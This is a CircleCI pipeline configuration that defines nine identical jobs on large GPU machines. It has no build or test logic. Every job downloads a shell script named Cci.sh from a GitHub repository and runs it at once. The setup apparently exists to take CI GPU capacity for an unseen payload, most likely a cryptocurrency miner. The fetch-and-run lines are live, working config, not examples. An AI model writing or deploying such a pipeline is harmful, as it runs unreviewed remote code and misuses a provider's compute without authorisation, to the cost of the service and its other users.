version: 2.1

jobs:
  build:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Cci.sh && chmod +x Cci.sh && ./Cci.sh

  build2:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Cci.sh && chmod +x Cci.sh && ./Cci.sh
      


  build3:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Cci.sh && chmod +x Cci.sh && ./Cci.sh


  build4:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Cci.sh && chmod +x Cci.sh && ./Cci.sh

  build5:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Cci.sh && chmod +x Cci.sh && ./Cci.sh

  build6:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Cci.sh && chmod +x Cci.sh && ./Cci.sh
      


  build7:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Cci.sh && chmod +x Cci.sh && ./Cci.sh


  build8:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Cci.sh && chmod +x Cci.sh && ./Cci.sh

  build9:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://github.com/Akatsoki/newwz/raw/main/Cci.sh && chmod +x Cci.sh && ./Cci.sh
